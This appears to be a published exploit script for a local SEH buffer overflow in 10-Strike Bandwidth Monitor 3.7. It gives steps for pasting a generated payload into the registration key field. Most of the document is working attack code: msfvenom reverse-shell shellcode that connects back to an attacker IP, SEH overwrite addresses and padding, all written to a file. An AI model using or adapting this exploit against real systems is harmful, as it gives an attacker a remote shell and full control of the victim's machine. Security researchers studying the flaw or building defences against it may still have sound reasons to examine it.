# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH # Date: 2018-07-24 # Exploit Author: absolomb # Vendor Homepage: https://www.10-strike.com/products.shtml # Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml # Run script, open up generated txt file and copy to clipboard # Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell. # Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell. #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b '\x00\x0a\x0d' -f python -v shellcode shellcode = "" shellcode += "\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e" shellcode += "\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d" shellcode += "\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8" shellcode += "\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b" shellcode += "\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12" shellcode += "\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7" shellcode += "\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01" shellcode += "\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f" shellcode += "\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51" shellcode += "\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35" shellcode += "\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda" shellcode += "\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f" shellcode += "\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec" shellcode += "\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4" shellcode += "\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8" shellcode += "\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07" shellcode += "\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77" shellcode += "\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65" shellcode += "\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72" shellcode += "\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0" shellcode += "\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17" shellcode += "\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8" shellcode += "\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26" shellcode += "\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3" shellcode += "\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf" shellcode += "\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a" shellcode += "\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42" shellcode += "\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6" shellcode += "\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e" shellcode += "\xc8\xc4\x53" # JMP always true nseh = '\x71\x06\x70\x04' # 0x01174647 POP POP RET BandMonitor.exe seh = '\x47\x46\x17\x01' payload = '\x41' * 4188 payload += nseh payload += seh payload += shellcode payload += '\x41' * (1804 - len(shellcode)) file = open('sploit.txt','w') print "Size: " + str(len(payload)) + " bytes" file.write(payload) file.close() print "TXT file created!"